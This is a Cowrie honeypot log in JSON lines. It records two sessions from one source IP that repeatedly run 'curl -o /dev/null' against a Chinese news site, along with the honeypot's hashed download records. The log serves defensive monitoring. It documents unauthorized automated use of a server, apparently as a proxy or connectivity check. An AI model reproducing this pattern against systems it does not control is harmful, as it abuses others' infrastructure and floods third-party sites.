{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:39.287945Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.289019Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:39.294478Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.295413Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.307410Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:39.333437Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.334441Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:39.338218Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.339575Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.345139Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.358367Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.366354Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:39.373193Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.374256Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:39.376691Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.377643Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.402767Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:39.412581Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.413555Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:39.415877Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.416595Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:39.452881Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.453879Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:39.455856Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.456974Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.474419Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.477279Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.491016Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.494581Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:39.496671Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.497687Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:39.500187Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.500810Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:39.534101Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.535101Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:39.542363Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.543149Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.548558Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:39.572369Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.573299Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:39.580755Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.581657Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.603474Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:39.609257Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.610108Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:39.619343Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.620240Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.630158Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:39.650208Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.651270Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.660372Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.662195Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:39.663677Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.664921Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.685789Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:39.691929Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.693003Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:39.712997Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.714474Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.721220Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:39.730325Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.731508Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.737729Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:39.753808Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.754916Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:39.773708Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.774775Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.780122Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:39.793389Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.794191Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:39.811374Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.812165Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.833247Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:39.837289Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.839950Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.844497Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:39.873405Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.874300Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:39.883056Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.883821Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.889506Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.907710Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:39.913602Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.914341Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:39.923444Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.924164Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:39.949280Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.950273Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.958412Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:39.968712Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.969469Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:39.988320Z","src_ip":"212.227.125.160","session":"7541ed730449"}
